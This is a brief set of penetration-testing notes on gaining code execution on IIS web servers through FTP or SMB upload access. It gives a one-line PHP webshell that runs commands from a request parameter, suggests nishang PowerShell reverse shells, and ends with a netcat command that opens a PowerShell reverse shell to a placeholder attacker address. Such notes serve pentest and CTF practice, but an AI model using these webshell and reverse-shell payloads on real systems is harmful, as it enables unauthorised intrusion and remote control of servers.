Comment on page
uploading a file to IIS
if you have a FTP uploading access, try uploading different types of files.
- ASP, ASPX
git clone it and grep the extension (grep asp$)
and rename the file to whatever.asp
- if it gives 500 error , try different webshells -> nishang ps1 -> reverse shell.
IIS server open and you have a smb share access on the web root.
try to create a web shell and upload it > access it!
<?php system($REQUEST['ippsec']) ?>
nc.exe attacker_IP 9001 -e powershell